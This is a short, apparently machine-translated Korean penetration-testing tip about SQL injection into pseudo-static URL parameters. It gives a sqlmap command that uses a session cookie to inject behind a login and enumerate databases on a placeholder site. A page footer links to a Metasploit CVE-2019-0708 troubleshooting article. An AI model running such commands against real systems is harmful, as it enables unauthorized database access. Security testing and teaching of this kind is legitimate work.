침투 테스트: sqlmap 의사 정적 주입 과 쿠키 소지 로그 인 인증 주입

의사 정적 주입

   url  ：【http://www.aaaa.com/xxxxx/gorepay-projectID_10-repayPlanID_46-periodNumber_2.html】

위 정적 매개 변수: 이 url 에는 모두 세 개의 매개 변수 전달 항목 [procjectID 10], [repay PlanID 46], [periodNumber 2]

이 위장 되 어 있 습 니 다.

수 동 주입 점: 이 세 개의 위 정적 매개 변수 에 주입 문 (payload)

을 추가 합 니 다.

sqlmap 주입: 모든 의사 정적 매개 변수 에 "*" 를 추가 하면 됩 니 다

sqlmap 웹 로그 인 인증 주입

python sqlmap.py -u “http://www.aaaa.com/xxxxx/gorepay-projectID_10-repayPlanID_46-periodNumber_2.html” --cookie=“_fmdata=0E97D79D747B983006FB09DAD60A349E7C023A44A3532E46E3AFB9936C4D45DB80647EFE905132167DAE9081F89D13AA86DADEDF8E69E484;” --dbs

이 내용에 흥미가 있습니까?

현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:

cve-2019-0708 msf 실행 오류 해결

cve-2019-0708 msf 실행 오류 해결 서버에 빈틈이 있는지 검사하는 과정에서 exploit의 오류가 발견되었고 오류 정보는 다음과 같다. 이미 뚜렷하다Exploit aborted due to failure...

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다